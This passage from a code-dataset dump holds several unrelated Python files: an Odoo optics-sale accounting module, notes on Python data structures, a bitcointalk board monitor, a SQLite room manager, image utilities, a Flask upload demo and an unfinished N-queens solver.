delivery_id=%s where id=%s\", (picking_id, ids[0]))\n cr.commit()\n ### Ends Here\n\n ###journal entry start\n if stored_obj:\n line_ids = []\n\n if context is None: context = {}\n if context.get('period_id', False):\n return context.get('period_id')\n periods = self.pool.get('account.period').find(cr, uid, context=context)\n period_id = periods and periods[0] or False\n ar_amount = stored_obj.due\n payment_method=stored_obj.payment_type\n if payment_method.service_charge<=0:\n has_been_paid=stored_obj.paid\n else:\n has_been_paid=stored_obj.to_be_paid\n ar_acc=6099\n account=stored_obj.payment_type.account.id\n service_account=stored_obj.payment_type.service_charge_account.id\n\n\n\n if ar_amount > 0:\n line_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': stored_obj.name,\n 'currency_id': False,\n 'credit': 0,\n 'date_maturity': False,\n 'account_id': ar_acc, ### Accounts Receivable ID\n 'debit': ar_amount,\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n\n if has_been_paid > 0:\n line_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': stored_obj.name,\n 'currency_id': False,\n 'credit': 0,\n 'date_maturity': False,\n 'account_id': account, ### Cash ID\n 'debit': has_been_paid,\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n\n if context is None:\n context = {}\n\n if stored_obj.total:\n line_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': stored_obj.name,\n 'currency_id': False,\n 'account_id': 6098, ##sepcticle income\n 'credit': stored_obj.total,\n 'date_maturity': False,\n 'debit': 0,\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n if stored_obj.service_charge>0:\n line_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': stored_obj.name,\n 'currency_id': False,\n 'account_id': service_account, ##sepcticle income\n 'credit': stored_obj.service_charge,\n 'date_maturity': False,\n 'debit': 0,\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n\n jv_entry = self.pool.get('account.move')\n\n j_vals = {'name': '/',\n 'journal_id': 2, ## Sales Journal\n 'date': fields.date.today(),\n 'period_id': period_id,\n 'ref': stored_obj.name,\n 'line_id': line_ids\n }\n\n saved_jv_id = jv_entry.create(cr, uid, j_vals, context=context)\n if saved_jv_id > 0:\n journal_id = saved_jv_id\n try:\n jv_entry.button_validate(cr,uid, [saved_jv_id], context)\n cr.execute(\"update optics_sale set state='confirmed' where id=%s\", (ids))\n cr.commit()\n for bills_vals in stored_obj:\n mr_value = {\n 'date': stored_obj.date,\n 'optics_sale_id': int(stored),\n 'amount': stored_obj.paid,\n 'type': stored_obj.type,\n 'p_type': 'advance',\n 'bill_total_amount': stored_obj.total,\n 'due_amount': stored_obj.due,\n }\n mr_obj = self.pool.get('leih.money.receipt')\n mr_id = mr_obj.create(cr, uid, mr_value, context=context)\n if mr_id is not None:\n mr_name = 'MR#' + str(mr_id)\n cr.execute('update leih_money_receipt set name=%s where id=%s', (mr_name, mr_id))\n cr.commit()\n except:\n import pdb\n pdb.set_trace()\n\n ###end journal entry\n\n\n else:\n raise osv.except_osv(_('Warning!'),\n _('Minimum Payment is Required'))\n #journal for cogs\n stock_picking_obj = self.pool['stock.picking'].browse(cr, uid, [picking_id],context=context)[0]\n if len(stock_picking_obj)>0:\n lines_ids = []\n\n for items in stock_picking_obj.move_lines:\n inv_value = 0\n for q_it in items.quant_ids:\n inv_value = inv_value + abs(q_it.inventory_value)\n break\n # import pdb\n # pdb.set_trace()\n\n lines_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': order.name,\n 'currency_id': False,\n 'credit': 0,\n 'date_maturity': False,\n 'account_id': items.product_id.categ_id.property_account_expense_categ.id, ### Cash ID\n 'debit': abs(inv_value),\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n lines_ids.append((0, 0, {\n 'analytic_account_id': False,\n 'tax_code_id': False,\n 'tax_amount': 0,\n 'name': order.name,\n 'currency_id': False,\n 'credit': abs(inv_value),\n 'date_maturity': False,\n 'account_id': items.product_id.categ_id.property_stock_account_output_categ.id,\n ### Accounts Receivable ID\n 'debit': 0,\n 'amount_currency': 0,\n 'partner_id': False,\n }))\n\n\n jvv_entry = self.pool.get('account.move')\n\n\n nj_vals = {'name': '/',\n 'journal_id': 2, ## Sales Journal\n 'date': fields.date.today(),\n 'period_id': period_id,\n 'ref': order.name,\n 'line_id': lines_ids\n\n }\n\n saved_jv_ids = jvv_entry.create(cr, uid, nj_vals, context=context)\n\n\n return self.pool['report'].get_action(cr, uid, ids, 'leih.report_optics_sale', context=context)\n\n def onchange_patient(self, cr, uid, ids, name, context=None):\n tests = {}\n dep_object = self.pool.get('patient.info').browse(cr, uid, name, context=None)\n abc = {'mobile': dep_object.mobile, 'address': dep_object.address, 'age': dep_object.age, 'sex': dep_object.sex}\n tests['value'] = abc\n return tests\n\n def bill_cancel(self, cr, uid, ids, context=None):\n ## Bill Status Will Change\n cr.execute(\"update optics_sale set state='cancelled' where id=%s\", (ids))\n cr.commit()\n return True\n\n def btn_pay_bill(self, cr, uid, ids, context=None):\n if not ids: return []\n inv = self.browse(cr, uid, ids[0], context=context)\n if inv.state == 'pending':\n raise osv.except_osv(_('Warning'), _('Please Confirm and Print the Optics Form'))\n if inv.total == inv.paid:\n raise osv.except_osv(_('Full Paid'), _('Nothing to Pay Here. Already Full Paid'))\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'leih',\n 'optics_sale_payment_form_view')\n #\n # total=inv.total\n\n return {\n 'name': _(\"Pay Invoice\"),\n 'view_mode': 'form',\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'optics.sale.payment',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'target': 'new',\n 'domain': '[]',\n 'context': {\n 'default_optics_sale_id': ids[0],\n 'default_amount': inv.due\n }\n }\n raise osv.except_osv(_('Error!'), _('There is no default company for the current user!'))\n\n def create(self, cr, uid, vals, context=None):\n f_prod_id = vals.get('frame_id')\n if f_prod_id:\n has_qty = False\n try:\n # f_prod_id = vals.get('frame_id')\n p_obj = self.pool['product.product'].browse(cr, uid, [f_prod_id], context=context)\n if p_obj.qty_available > 0:\n has_qty = True\n except:\n pass\n if has_qty == False:\n raise osv.except_osv(_('Warning!'),\n _('Stock is not available'))\n if context is None:\n context = {}\n stored = super(optics_sale, self).create(cr, uid, vals, context) # return ID int object\n if stored is not None:\n name_text = 'OPT- 0' + str(stored)\n cr.execute('update optics_sale set name=%s where id=%s', (name_text, stored))\n cr.commit()\n return stored\n\n def write(self, cr, uid, ids, vals, context=None):\n return super(optics_sale, self).write(cr, uid, ids, vals, context=context)\n\n @api.onchange('optics_lens_sale_line_id')\n def onchange_lens_bill(self):\n sumalltest = 0\n for item in self.optics_lens_sale_line_id:\n sumalltest = sumalltest + item.total_amount\n self.total = sumalltest + self.price\n self.due = sumalltest - self.paid + self.price\n return \"X\"\n\n @api.onchange('frame_id')\n def onchange_frame_bill(self):\n frame_code=self.frame_id\n self.price=frame_code.list_price\n self.qty_available=frame_code.qty_available\n return 'X'\n # import pdb\n # pdb.set_trace()\n\n\n @api.onchange('paid')\n def onchange_paid(self):\n self.due = self.total - self.paid\n if self.payment_type:\n if self.payment_type.name=='Visa Card':\n interest = self.payment_type.service_charge\n service_charge = (self.paid * interest) / 100\n self.service_charge = service_charge\n self.to_be_paid = self.paid + service_charge\n return 'x'\n\n @api.onchange('price')\n def onchange_price(self):\n sumalltest = 0\n for item in self.optics_lens_sale_line_id:\n sumalltest = sumalltest + item.total_amount\n self.total = self.price + sumalltest\n self.due = self.price + sumalltest - self.paid\n return 'x'\n\n # @api.onchange('doctors_discounts')\n # def onchange_doc_discount(self):\n # aft_discount = (self.total * (self.doctors_discounts / 100))\n # self.after_discount = aft_discount\n # self.grand_total = self.total - aft_discount - self.other_discount\n # self.due = self.total - aft_discount - self.other_discount - self.paid\n #\n # return \"X\"\n @api.onchange('other_discount')\n def onchange_other_discount(self):\n self.grand_total = self.total - self.after_discount - self.other_discount\n self.due = self.total - self.after_discount - self.other_discount - self.paid\n return 'True'\n\n\n# class optics_information(osv.osv):\n# _name = 'optics.sale.line'\n#\n# def _amount_all(self, cr, uid, ids, field_name, arg, context=None):\n# cur_obj = self.pool.get('optics.sale')\n# res = {}\n# for record in self.browse(cr, uid, ids, context=context):\n# rate = record.price\n# discount = record.discount\n# interst_amount = int(discount) * int(rate) / 100\n# total_amount = int(rate) - interst_amount\n# res[record.id] = total_amount\n# # import pdb\n# # pdb.set_trace()\n# return res\n#\n# _columns = {\n#\n# 'name': fields.many2one(\"product.product\", \"Item Name\", ondelete='cascade'),\n# 'optics_sale_id': fields.many2one('optics.sale', \"Information\"),\n# 'department': fields.char(\"Department\"),\n# 'delivery_date': fields.date(\"Delivery Date\"),\n# 'date': fields.datetime(\"Date\", readonly=True, default=lambda self: fields.datetime.now()),\n# # 'currency_id': fields.related('pricelist_id', 'currency_id', type=\"many2one\", relation=\"res.currency\",\n# # string=\"Currency\", readonly=True, required=True),\n# # 'price_subtotal': fields.function(_amount_line, string='Subtotal', digits_compute=dp.get_precision('Account')),\n# 'price': fields.integer(\"Price\"),\n# 'qty': fields.integer(\"Quantity\"),\n# 'total_amount': fields.integer(\"Total Amount\"),\n# 'assign_doctors': fields.many2one('doctors.profile', 'Doctor'),\n# 'commission_paid': fields.boolean(\"Commission Paid\"),\n#\n# }\n# def onchange_test(self, cr, uid, ids, name, context=None):\n# tests = {'values': {}}\n# dep_object = self.pool.get('product.product').browse(cr, uid, name, context=None)\n#\n# abc = {'price': dep_object.list_price, 'total_amount': dep_object.list_price,\n# 'optics_sale_id.paid': dep_object.list_price}\n# tests['value'] = abc\n# # import pdb\n# # pdb.set_trace()\n# return tests\n# def onchange_discount(self, cr, uid, ids, name, discount, context=None):\n# tests = {'values': {}}\n# dep_object = self.pool.get('examination.entry').browse(cr, uid, name, context=None)\n# abc = {'total_amount': round(dep_object.rate - (dep_object.rate * discount / 100))}\n# tests['value'] = abc\n# # import pdb\n# # pdb.set_trace()\n# return tests\n# def create(self, cr, uid, vals, context=None):\n# # deliry_min_time\n# stored = super(optics_information, self).create(cr, uid, vals, context)\n#\n#\n# # today = datetime.datetime.strftime(datetime.datetime.today(), '%d/%m/%Y-%Hh/%Mm')\n#\n# return 0\n# def write(self, cr, uid, vals, context=None):\n# import pdb\n# pdb.set_trace()\n# starting the process of frame\nclass optics_lens_information(osv.osv):\n _name = 'optics.lens.sale.line'\n _columns = {\n 'name': fields.many2one(\"product.lens\", \"Lens Name\", ondelete='cascade'),\n 'product_id': fields.many2one('product.product', \"Lens Name\"),\n 'optics_sale_id': fields.many2one('optics.sale', \"Information\"),\n 'price': fields.integer(\"Unit Price\"),\n 'qty': fields.integer(\"Quantity\"),\n 'total_amount': fields.integer(\"Total Amount\"),\n }\n\n def onchange_lens(self, cr, uid, ids, name, context=None):\n tests = {'values': {}}\n return tests\n\n def onchange_price(self, cr, uid, ids, qty, price, context=None):\n tests = {'values': {}}\n total_line = price * qty\n abc = {'qty': qty, 'total_amount': total_line}\n tests['value'] = abc\n return tests\n\n def onchange_qty(self, cr, uid, ids, qty, price, context=None):\n tests = {'values': {}}\n\n total_line = price * qty\n abc = {'qty': qty, 'total_amount': total_line}\n tests['value'] = abc\n #\n\n return tests\n # def onchange_discount(self, cr, uid, ids, name, discount, context=None):\n # tests = {'values': {}}\n # dep_object = self.pool.get('examination.entry').browse(cr, uid, name, context=None)\n # abc = {'total_amount': round(dep_object.rate - (dep_object.rate * discount / 100))}\n # tests['value'] = abc\n # # import pdb\n # # pdb.set_trace()\n # return tests\n # def create(self, cr, uid, vals, context=None):\n # # deliry_min_time\n # stored = super(optics_lens_information, self).create(cr, uid, vals, context)\n # optics_sale_line_object = self.browse(cr, uid, stored, context=context)\n # test_name = optics_sale_line_object.name\n # required_time = test_name.required_time\n # today = date.today()\n # delivery_date = today + timedelta(days=required_time)\n # cr.execute(\"update optics_sale_line set delivery_date=%s where id=%s\", (delivery_date, stored))\n # cr.commit()\n #\n # # today = datetime.datetime.strftime(datetime.datetime.today(), '%d/%m/%Y-%Hh/%Mm')\n #\n # return 0\n # def write(self, cr, uid, vals, context=None):\n # import pdb\n # pdb.set_trace()\n\n\n# end of the process of lance\nclass admission_payment_line(osv.osv):\n _name = 'optics.sale.payment.line'\n _columns = {\n 'optics_sale_payment_line_id': fields.many2one('optics.sale', 'bill register payment'),\n 'date': fields.datetime(\"Date\"),\n 'amount': fields.float('Amount'),\n 'type': fields.char('Type'),\n 'card_no': fields.char('Card Number'),\n 'bank_name': fields.char('Bank Name'),\n 'money_receipt_id': fields.many2one('leih.money.receipt', 'Money Receipt ID'),\n }\n","sub_path":"optics/optics_sale.py","file_name":"optics_sale.py","file_ext":"py","file_size_in_byte":28133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509332392","text":"import heapq\nfrom collections import *\nfrom itertools import groupby\nfrom operator import itemgetter\n\n# 解压序列赋值给多个变量\ndata = ['ACME', 50, 91.1, (2012, 12, 21)]\nname, shares, price, date = data # 按位置进行取值\n_, i_shares, i_price, _ = data # 可以通过占位符来跳过相应的取值\n# 一般很少这样取值,大多数利用下标取值\n\n# 解压可迭代对象赋值给多个变量\nrecord = ('Dave', 'dave@example.com', '773-555-1212', '847-555-1212')\nr_name, email, *phone_numbers = record # 通过*可直接接收剩余的取值\nhead, *_ = record # 通过无限占位符跳过相应值\n\n# 保留最后 N 个元素 // 利用容量固定的队列,如果装满就删除第一个元素再添加\nq = deque(maxlen=3) # 生成固定的队列,不添加3就是无限队列\n\n# 查找最大或最小的 N 个元素\nnums = [1, 8, 2, 23, 7, -4, 18, 23, 42, 37, 2]\nmin(nums), max(nums) # 值分别为-4,42\nheapq.nsmallest(3, nums), heapq.nlargest(3, nums) # 值为[-4, 1, 2],[42, 37, 23]\n\n# 字典排序\nd = OrderedDict() # 内部维持着一个双向链表,所以需要的空间也就是默认字典的两倍\nd['foo'], d['bar'], d['spam'], d['grok'] = 1, 2, 3, 4\n\n# 字典运算\n# 逻辑运算\nprices = {'ACME': 45.23, 'AAPL': 612.78, 'IBM': 205.55, 'HPQ': 37.20, 'FB': 10.75}\n# sorted(price) // 错误的排序形式,只能指定排序的键值\nsorted(prices.values()) # 只对值进行了临时的排序,[10.75, 37.2, 45.23, 205.55, 612.78]\nsorted(prices.keys()) # 只对键临时排序,dict_keys(['ACME', 'AAPL', 'IBM', 'HPQ', 'FB'])\nprices_sorted = sorted(zip(prices.values(), prices.keys()))\n# 先比较值后比较键,全部显示,[(10.75, 'FB'), (37.2, 'HPQ'), (45.23, 'ACME'), (205.55, 'IBM'), (612.78, 'AAPL')]\n# 数学运算\nmin(prices) # 根据键获得最小值,AAPL\nmin(prices, key=lambda k: prices[k]) # 根据值获得最小值的键,FB\nmin(zip(prices.keys(), prices.values())) # 先比较值在比较键,('AAPL', 612.78)\n\n# 查找两字典的相同点\na, b = {'x': 1, 'y': 2, 'z': 3}, {'w': 10, 'x': 11, 'y': 2}\n# 差集\nc = a.keys() - b.keys() # {'z'}\n# 并集\nd = dict(a, **b) # 存在dict构造函数疑惑,{'x': 11, 'y': 2, 'z': 3, 'w': 10}\n# 交运算\na.items() & b.items() # {('y', 2)},字典的差,并,交只能在键上运算,如果要对值运算就需要将值化为set集合再运算\n\n# 序列中出现次数最多的元素\nwords = [\n 'look', 'into', 'my', 'eyes', 'look', 'into', 'my', 'eyes',\n 'the', 'eyes', 'the', 'eyes', 'the', 'eyes', 'not', 'around', 'the',\n 'eyes', \"don't\", 'look', 'around', 'the', 'eyes', 'look', 'into',\n 'my', 'eyes', \"you're\", 'under'\n]\nword_counts = Counter(words)\n# 出现频率最高的3个单词\ntop_three = word_counts.most_common(3) # [('eyes', 8), ('the', 5), ('look', 4)]\n\n# 字典列表的排序\nrows = [\n {'fname': 'Brian', 'lname': 'Jones', 'uid': 1003},\n {'fname': 'David', 'lname': 'Beazley', 'uid': 1002},\n {'fname': 'John', 'lname': 'Cleese', 'uid': 1001},\n {'fname': 'Big', 'lname': 'Jones', 'uid': 1004}\n]\nrows_by_fname = sorted(rows, key=itemgetter('fname')) # 根据指定的键排序\nmin_by_fname = min(rows, key=itemgetter('uid')) # 根据指定的键取值\n# 排序不支持原生比较的对象,但是只要你只要提供一个key参数同样可以进行排序\n\n# 通过某个字段将记录分组\nnew_rows = [\n {'address': '5412 N CLARK', 'date': '07/01/2012'},\n {'address': '5148 N CLARK', 'date': '07/04/2012'},\n {'address': '5800 E 58TH', 'date': '07/02/2012'},\n {'address': '2122 N CLARK', 'date': '07/03/2012'},\n {'address': '5645 N RAVENSWOOD', 'date': '07/02/2012'},\n {'address': '1060 W ADDISON', 'date': '07/02/2012'},\n {'address': '4801 N BROADWAY', 'date': '07/01/2012'},\n {'address': '1039 W GRANVILLE', 'date': '07/04/2012'},\n]\nnum = sorted(new_rows, key=itemgetter('date')) # 首先需要排序\nfor date, items in groupby(num, key=itemgetter('date')): # 一个非常重要的准备步骤是要根据指定的字段将数据排序\n print(date)\n for item in items:\n print(item)\n\n# 从字典中提取子集\nprices = {'ACME': 45.23, 'AAPL': 612.78, 'IBM': 205.55, 'HPQ': 37.20, 'FB': 10.75}\np1 = {key: value for key, value in prices.items() if value > 200} # {'AAPL': 612.78, 'IBM': 205.55} 速度最快\n\n# 命名元组\nSubscriber = namedtuple('Subscriber', ['addr', 'joined'])\nsub = Subscriber('jonesy@example.com', '2012-10-19') # 通过命名元组避免了下标的不清晰性,增点的点运算.要注意的是一元命名元组是不可更改的\n\n","sub_path":"数据结构和算法/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"84483754","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport time\nimport MySQLdb\nimport json\nimport configparser\nimport logging\nimport logging.config\nimport os\nimport re\nimport httplib, urllib\nfrom lxml import html\nimport sys\n\n\nsys.path.insert(0, os.path.abspath('..'))\n\nimport core.conf as conf\nimport core.core as core\n\ndirpath=os.path.dirname(os.path.abspath(__file__))\nid_file_path = dirpath + \"/id.txt\"\n\nPUSHOVER_APP_ID = \"apg2fy55cjiyzdnxfco7rf4njo1kdv\"\n\ndef tick():\n\tcontent = _get_content()\n\t# content = _get_content_from_file()\n\tlastid = 0\n\tif len(content) == 0:\n\t\treturn\n\t\t\n\twith open(id_file_path,'r') as rf:\n\t\tlastid = int(rf.read())\n\tmaxid = lastid\n\n\ttree = html.fromstring(content)\n\tnodes = tree.xpath('//*[@class=\"windowbg\"]/span/a')\n\tfor node in nodes:\n\t\turl = node.get(\"href\")\n\t\ttext = node.text\n\n\t\ttid = int(re.match(r'(.*)=(\\d*)', url).group(2))\n\t\tif tid > lastid:\n\t\t\t_findit(tid, url, text)\n\n\t\t# update maxid\n\t\tif tid > maxid:\n\t\t\tmaxid = tid\n\n\twith open(id_file_path, 'wb+') as wf:\n\t\twf.write(str(maxid))\n\ndef _findit(tid, url, title):\n\tcontent = (\"tid = {0}\\n url = {1}\\n title = \".format(tid, url) + title)\n\tcore.pushover(PUSHOVER_APP_ID, content)\n\ndef _get_content():\n\tpage = requests.get('https://bitcointalk.org/index.php?board=159.0')\n\tif page.status_code != 200:\n\t\tcore.info(\"req bitcointalk status code : {0}\".format(page.status_code))\n\t\treturn \"\"\n\treturn page.content\n\ndef _get_content_from_file():\n\tf = open(\"page.html\",\"rb+\")\n\tcontent = f.read()\n\tf.close()\n\treturn content\n\nif __name__ == \"__main__\":\n\ttick()\n\t# _send_sms(\"url = xxx \\n tid = xxx\\n name=xxx\")\n","sub_path":"icomonitor/icomonitor.py","file_name":"icomonitor.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"407264536","text":"import sqlite3\n\nclass DataManager():\n \"\"\" Il y aura qautres tables dans la base de données:\n - une pour les plans avec trois champs: nom->texte, id->entier, chambres->texte\n - une pour les chambres avec quatre champs: nom->texte, id->entier, état->texte, lits->texte\n - une pour les lits avec deux champs: id->entier, état->texte\n - une pour tenir à jour les id: plans, chambres, lits\"\"\"\n def __init__(self):\n self.conn = sqlite3.connect(\"Data/data.db\")\n self.conn.row_factory = sqlite3.Row\n self.c = self.conn.cursor()\n\n def new_chambre(self, caracs):\n #caracs est un dictionnaire contenant: {nom\":?, \"etat\":?, \"lits\":[?]}\n caracs[\"id\"] = self.determiner_id(\"chambres\")\n cmd = \"INSERT INTO chambres VALUES (:nom,:id, :etat, :lits)\"\n self.c.execute(cmd, caracs)\n self.conn.commit()\n return caracs[\"id\"]\n\n def new_plan(self, caracs):\n #caracs est un dictionnaire contenant: {nom\":?, \"chambres\":[?]}\n caracs[\"id\"] = self.determiner_id(\"plans\")\n cmd = \"INSERT INTO plans VALUES (:nom,:id, :chambres)\"\n self.c.execute(cmd, caracs)\n self.conn.commit()\n return caracs[\"id\"]\n\n def get_chambre(self, id):\n list_args = [\"nom\", \"id\", \"etat\", \"lits\"]\n self.c.execute(\"SELECT * FROM chambres WHERE id=:id\", {'id':id})\n row = self.c.fetchone()\n if row != None:\n Data = {}\n for i in range(len(list_args)):\n Data[list_args[i]] = row[i]\n return Data\n else:\n return \"NoChambreData\"\n\n def get_plan(self, id):\n list_args = [\"nom\", \"id\", \"chambres\"]\n print(id)\n self.c.execute(\"SELECT * FROM plans WHERE id=:id\", {'id':id})\n row = self.c.fetchone()\n if row != None:\n Data = {}\n for i in range(len(list_args)):\n Data[list_args[i]] = row[i]\n return Data\n else:\n return \"NoPlanData\"\n\n def edit_chambre(self, id, caracs):\n cmd = \"UPDATE chambres SET \"\n k = caracs.keys()\n j=0\n for i in k:\n if j == 0:\n cmd += f\"{i}=:{i}\"\n else:\n cmd += f\", {i}=:{i}\"\n j+=1\n cmd += \" WHERE id=:id\"\n caracs[\"id\"] = int(id)\n self.c.execute(cmd, caracs)\n self.conn.commit()\n\n def determiner_id(self, table):\n #fonction qui détermine une id UNIQUE pour chaques membres de la base de données\n data_to_send = {}\n cmd = \"SELECT * FROM id\"\n self.c.execute(cmd)\n ids = self.c.fetchone()\n id_disponible = ids[table]\n for key in ids.keys():\n data_to_send[key] = ids[key]\n data_to_send[table]+=1\n cmd = \"UPDATE id SET plans=:plans, chambres=:chambres, lits=:lits\"\n self.c.execute(cmd, data_to_send)\n self.conn.commit()\n return id_disponible\n","sub_path":"Src/VersionFinale/Data.py","file_name":"Data.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"585513583","text":"import numpy as np\nimport torch\nfrom PIL import Image\n\n#---------------------------------------------------------#\n# 将图像转换成RGB图像,防止灰度图在预测时报错。\n# 代码仅仅支持RGB图像的预测,所有其它类型的图像都会转化成RGB\n#---------------------------------------------------------#\ndef cvtColor(image):\n if len(np.shape(image)) == 3 and np.shape(image)[2] == 3:\n return image \n else:\n image = image.convert('RGB')\n return image \n\n#---------------------------------------------------#\n# 对输入图像进行resize\n#---------------------------------------------------#\ndef resize_image(image, size, letterbox_image):\n iw, ih = image.size\n w, h = size\n if letterbox_image:\n scale = min(w/iw, h/ih)\n nw = int(iw*scale)\n nh = int(ih*scale)\n\n image = image.resize((nw,nh), Image.BICUBIC)\n new_image = Image.new('RGB', size, (128,128,128))\n new_image.paste(image, ((w-nw)//2, (h-nh)//2))\n else:\n new_image = image.resize((w, h), Image.BICUBIC)\n return new_image\n\ndef get_num_classes(annotation_path):\n with open(annotation_path) as f:\n dataset_path = f.readlines()\n\n labels = []\n for path in dataset_path:\n path_split = path.split(\";\")\n labels.append(int(path_split[0]))\n num_classes = np.max(labels) + 1\n return num_classes\n\n#---------------------------------------------------#\n# 获得学习率\n#---------------------------------------------------#\ndef get_lr(optimizer):\n for param_group in optimizer.param_groups:\n return param_group['lr']\n\ndef preprocess_input(image):\n image /= 255.0 \n return image\n\ndef show_config(**kwargs):\n print('Configurations:')\n print('-' * 70)\n print('|%25s | %40s|' % ('keys', 'values'))\n print('-' * 70)\n for key, value in kwargs.items():\n print('|%25s | %40s|' % (str(key), str(value)))\n print('-' * 70)","sub_path":"cv/face/facenet/pytorch/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619763309","text":"#!/usr/bin/python3\n# @FileName :demo01_ajax.py\n# @Time :2020/6/7 下午12:47\n# @Author :ABC\n# @Description :\nimport os\n\nfrom flask import Flask, render_template, request, send_from_directory\nfrom werkzeug.utils import secure_filename\n\n'''\n限制文件上传的大小\n'''\napp = Flask(__name__)\napp.config['MAX_CONTENT_LENGTH'] = 1024 * 1024 # 通过设置配置项中的`MAX_CONTENT_LENGTH`参数限制上传文件的大小为1M,也就是1024*1024\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'GET':\n return render_template('index.html')\n elif request.method == 'POST':\n print('request.json:', request.json)\n return 'success!'\n\n\ndef allowed(filename):\n '''\n 限制上传文件的类型\n '''\n support_file_extension_list = ['png', 'jpg', 'html', 'txt']\n file_extension = filename.split('.')[-1]\n if file_extension in support_file_extension_list:\n return True\n return False\n\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload():\n file = request.files.get('pic')\n if file is None:\n return render_template('index.html')\n if allowed(file.filename):\n # secure_filename(filename)方法返回一个安全版本的文件名。它会将不规则(在浏览器URL里)的文件名重命名为规则的文件名。\n file.save(secure_filename(file.filename))\n print('file:', file)\n return 'save file success!'\n return 'error,unsupported file format!'\n\n\n# 在浏览器中可以访问静态文件夹static中img目录下的图片\n@app.route('/upload/', methods=['GET', 'POST'])\ndef get_upload(filename):\n # print('filename:', filename)\n # print('path1:', os.getcwd())\n # print('path2:', os.path.join(os.getcwd(), 'static/img'))\n return send_from_directory(os.path.join(os.getcwd(), 'static/img'), filename)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"learn_flask/flask05_requestObj_and_responseObj/demo01_ajax.py","file_name":"demo01_ajax.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"399090922","text":"from Biblioteca import *\r\n\r\n#Infrastructure/Repository Layer\r\n\r\nclass BookFileRepository:\r\n def __init__(self):\r\n self.carti = []\r\n\r\n def loadFromFile(self):\r\n f = open(\"datein.txt\", \"r\")\r\n line = f.readline().strip()\r\n rez = []\r\n while line != \"\":\r\n attrs = line.split(\" \")\r\n st = Carte(attrs[0], attrs[1])\r\n rez.append(st)\r\n self.carti.append(st)\r\n line = f.readline().strip()\r\n f.close()\r\n return rez\r\n\r\n def storeToFile(self, sts):\r\n f = open(\"datein.txt\", \"w\")\r\n strf = \"\"\r\n print(sts)\r\n for st in sts:\r\n strf =strf + str(st.getId())+\" \"+st.getTitlu()\r\n strf = strf + \"\\n\"\r\n f.writelines(strf)\r\n print(strf)\r\n f.close()\r\n\r\n def depoziteazaCarte2(self, st):\r\n allS = self.loadFromFile()\r\n allS.append(st)\r\n self.carti.append(st)\r\n self.storeToFile(allS)\r\n\r\n def stergeCarte2(self, cartii):\r\n id = input(\"ID: \")\r\n for carte in cartii:\r\n if carte.getId() == id:\r\n cartii.remove(carte)\r\n self.carti = cartii\r\n self.storeToFile(self.carti)\r\n\r\n def modificaCarte2(self, cartenoua):\r\n id = input(\"ID Carte modificata = \")\r\n for carte in self.carti:\r\n if carte.getId() == id:\r\n self.carti.remove(carte)\r\n self.carti.append(cartenoua)\r\n print(self.carti)\r\n self.storeToFile(self.carti)\r\n","sub_path":"BookFileRepository.py","file_name":"BookFileRepository.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"46048396","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[85]:\n\n\nimport random\nimport math\nimport matplotlib.pyplot as plt\n\n\n# In[86]:\n\n\nimport numpy as np\nboard=[[]]\nprint ('Veuillez entrer la taille du echiquier : ')\nn = input()\nboard=np.random.randint(n, size=(4,4))\nprint(board)\nm=board.size\nprint(m)\n\n\n# In[87]:\n\n\ndef isSafe(board, row, col): \n \n # Check this row on left side \n N=4\n for i in range(col): \n if board[row][i] == 1: \n return False\n \n # Check upper diagonal on left side \n for i, j in zip(range(row, -1, -1), range(col, -1, -1)): \n if board[i][j] == 1: \n return False\n \n # Check lower diagonal on left side \n for i, j in zip(range(row, N, 1), range(col, -1, -1)): \n if board[i][j] == 1: \n return False\n \n return True\n\n\n# In[88]:\n\n\nisSafe(board, 2, 2)\n\n\n# In[89]:\n\n\ndef Deplacer(board, col): \n # base case: If all queens are placed \n # then return true\n N=4\n if col >= N: \n return True\n \n # Consider this column and try placing \n # this queen in all rows one by one \n for i in range(N): \n \n if isSafe(board, i, col): \n # Place this queen in board[i][col] \n board[i][col] = 1\n \n # recur to place rest of the queens \n if Deplacer(board, col + 1) == True: \n return True\n \n # If placing queen in board[i][col \n # doesn't lead to a solution, then \n # queen from board[i][col] \n board[i][col] = 0\n \n # if the queen can not be placed in any row in \n # this colum col then return false \n return False\ndef solveNQ(): \n board = [ [0, 0, 0, 0], \n [0, 0, 0, 0], \n [0, 0, 0, 0], \n [0, 0, 0, 0] \n ] \n \n if Deplacer(board, 0) == False: \n print (\"Solution does not 